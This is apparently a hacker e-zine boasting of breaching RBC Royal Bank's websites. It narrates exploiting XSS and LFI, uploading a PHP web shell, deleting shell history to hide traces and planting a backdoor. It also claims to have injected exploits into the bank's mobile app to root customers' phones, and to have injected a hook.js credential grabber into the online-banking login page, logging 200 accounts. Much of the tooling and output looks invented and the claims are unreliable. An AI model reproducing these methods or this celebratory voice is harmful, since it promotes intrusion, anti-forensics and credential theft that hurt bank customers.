How I owned the RBC

1. _________
2. | _ _ |
3. .--.|_/ | | \_|_ .--.
4. / .'`\ \ | | [ '/'`\ \
5. | \__. | _| |_ | \__/ |
6. '.__.' |_____| | ;.__/
7. [__|
8.  
9. #owntheplanet
10. @hackthearmy
11.  
12. don@otp:~$ ./dir.sh
13.  
14. listing dir…
15.  
16. [1.] introduction
17. [2.] web app vulnerabilities
18. [3.] web shell and pseudo terminal shell you say?
19. [4.] ./ripmobile.sh (mobile.rbcroyalbank.com)
20.  
21.  
22. ___________________________________________________________________
23. [introduction] :
24. Congrats you have stumbled upon something that probably no reporter, no security analyst will come across during their research because they drown themselves in google dorking e-zines they find in the common grounds of the internet, and don't bother searching the less known, yet, easy to find e-zines. Today, I will discuss how my dog and I owned every system the RBC Royal Bank has.
25. ___________________________________________________________________
26. [web app vulnerabilities]
27. After managing to find XSS in the domain and an LFI in the domain, I decided in to just use the LFI to my advantage and see if I can upload a shell to the domain. (next time you are securing your domain, put restrictions on what type of file ext users who don’t have root can upload. Sincerely, ~otp)
28. XSS(main domain) ~~~~~~~~ https://i.imgur.com/0SPCraV.png
29. LFI(main domain) ~~~~~~~~ https://i.imgur.com/atyEC3n.png
30. ___________________________________________________________________
31. [web shell and pseudo terminal shell you say?]
32. I uploaded a .php shell to their domain and decided to have some fun with uid=0(root) on all their domains, and which a special domain that my main focus was, which was the mobile app they used which was hosted and all client info would pass through mobile.rbcroyalbank.com . So, I decided to begin using my favorite shell, the 404 pseudo terminal shell, which would allow me to execute malware on the app and list all the file and domains comfortably from my terminal.
33. Webshell(main domain) ~~~~~~~ https://i.imgur.com/IX4i3jv.png
34. >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
35.  
36. don@otp:~$ ./404.sh -t http://www.rbcroyalbank.com/REDACTED-REDACTED/REDACTED-REDACTED-REDACTED/REDACTED/REDACTED-REDACTED/REDACTED.php
37.  
38. connection to target (SSL)…
39.  
40. connection complete.
41.  
42. running pseudo terminal session…
43.  
44.  
45.  
46.  
47. ____
48. ,M 6MMMMb ,M
49. ,dM 6M' `Mb ,dM
50. ,dMM MM MM ,dMM
51. ,d MM MM MM ,d MM
52. ,d MM MM MM ,d MM
53. ,d MM YM. ,M9 ,d MM
54. MMMMMMMM YMMMM9 MMMMMMMM
55. MM MM
56. MM MM
57. MM MM .sh
58.  
59. coded by les miserables, educational purposes only.
60.  
61. 404@rbcroyalbank.com:~$ use /tools/list/dirs.sh —root
62.  
63.  
64. /
65. _assets-custom/
66. credit-cards/
67. international-money-transfer/
68. personal-loans/
69. savingsspot/
70. uos/
71. customer-service/
72. investing/
73. usbanking/
74. mobile/
75. products/
76. visagiftcard/
77. cgi-bin/
78. includes/
79. myfinancetracker/
80. resp/
81. tfsa/
82. online/
83. travelinsurance/
84. 404@rbcroyalbank.com:~$ rm -f .bash_history
85. 404@rbcroyalbank.com:~$ rm -f .sh_history
86. 404@rbcroyalbank.com:~$ rm -f .mysql_history
87. 404@rbcroyalbank.com:~$ use /tools/backdoors/REDACTED-REDACTED.sh -REDACTED -set /REDACTED/REDACTED/REDACTED
88. 404@rbcroyalbank.com:~$
89.  
90.  
91. ___________________________________________________________________
92. [.ripmobile.sh (mobile.rbcroyalbank.com)]
93. After archiving all of their client bank account information, credit card, web banking login(Username / pass), I decided, just for the fun of it, to use every exploit thats public for gaining access to IOS, Windows Phone, Blackberry, and Android Devices and inject it in their app for mobile devices. The only words I have to say regarding this is Oh boy, because this was the funniest thing I have done in a while, pulling off a Linux Mint hack (amirite Yevgeniy N) and exploiting all these phones. Turns out I couldn’t force the application to update automatically so I rooted a small portion of devices before I rm -f’d the malware off the app. I have mercy, yes, I am a disgrace hah. I decided then to use the phones that I rooted, and have fun with them.
94. >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
95.  
96.  
97. don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) —root (who) -update
98.  
99.  
100. Antoine’s_Iphone5:3333:uid=0(root) gid=0(root) groups=0(root)
101. Alices_Ipadmini:3333:uid=0(root) gid=0(root) groups=0(root)
102. Juliettes_Iphone:3333:uid=0(root) gid=0(root) groups=0(root)
103. HanahsAndroidphone:3333:uid=0(root) gid=0(root) groups=0(root)
104.  
105. don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) -root HanahsAndroidphone:3333
106. rip@mobile:~/HanahsAndroidphone$ use /wifi/bluetooth/listen.sh
107.  
108. loading…
109. {"wifi":"on","bluetooth":"on","bluetoothLowEnergy”:”100”,”cellular”:”100”}
110.  
111. listening on port:3333 …
112.  
113. exiting…
114.  
115. saved under /ripmobile/root/victims/HanahsAndroidphone/listen.log
116.  
117. don@otp:~$
118.  
119.  
120. ___________________________________________________________________
121. [itzy bitzy spider]
122. After messing with the mobile application, and barely touching the domain (besides archiving their entire database), and since people used the web banking more than the application, I decided to inject the web banking login pages with hook.js . I logged back into the 404 shell I placed earlier, and decided to begin using my script to inject their web banking page.
123. >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
124.  
125. 404@rbcroyalbank.com:~$ ./itzybitsy.pl -i -ext “js” -d /REDACTED/hook.js -t (https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH)
126.  
127.  
128.  
129. [14:38:43][*] connecting to www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH …
130. [14:38:43][*] connected.
131. [14:38:43] | injecting hook.js …
132. [14:38:43] | configuring webpanel…
133. [14:38:43] | configuring pseudoterminal panel…
134. [14:38:43][*] user : REDACTED
135. [14:38:44][*] password : REDACTED
136. [14:38:49][INFO] IF YOU ENTER THE INCORRECT 4+ TIMES PANEL WILL SELF-RM.
137. [14:38:49][*] Modules loaded.
138. [14:38:49][*] spider is up and running!
139. [14:38:49][+] running on network interface: REDACTED
140. [14:38:49] | Hook URL: REDACTED
141. [14:38:49] |_ UI URL: REDACTED
142. [14:38:49][+] running on network interface: REDACTED
143. [14:38:49] | Hook URL: REDACTED/hook.js
144. [14:38:49] |_ UI URL: REDACTED
145. [14:38:49][*] Spider server running, [CONTROL-C] to exit.
146.  
147.  
148. >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
149.  
150.  
151. After injecting the web banking with a browser hook, user and password grabber,
152. I went to go get coffee, yes this is part of the zine, shut up.
153.  
154. I logged the IPs, bank account username and password of each account that passed through the 30 minute set.
155. (200 accounts logged)
156.  
157. IPs logged ~~~~~ https://i.imgur.com/MOE9Abl.png
158.  
159.  
160.  
161. ___________________________________________________________________
162. [outro]
163. Thanks for reading my e-zine, hope you enjoyed stupid foreign banks getting FuKin OwNed. Follow my twitter @fuckinterpol for more. and remember, #OwNtHePlaNeT -don corelone